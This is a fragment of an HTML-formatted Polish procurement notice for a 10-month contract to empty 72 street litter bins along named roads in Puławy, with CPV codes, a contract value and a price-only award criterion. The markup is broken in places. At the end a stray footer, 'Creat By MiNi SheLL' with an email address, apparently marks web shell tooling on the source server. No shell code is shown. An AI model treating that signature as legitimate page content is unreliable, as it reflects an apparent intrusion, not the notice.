                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zakres prac obejmuje odbiór śmieci / nieczystości z 72 szt. śmietniczek ulicznych zlokalizowanych w ciągu dróg wojewódzkich na terenie miasta Puławy, wzdłuż ulic: Dęblińskiej, Piaskowej, Czartoryskich, Głębokiej, Zielonej, Kazimierskiej, Włostowickiej, Centralnej i Piłsudskiego.   <br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90600000-3, 90513200-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  20424.00<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">LN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 10<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com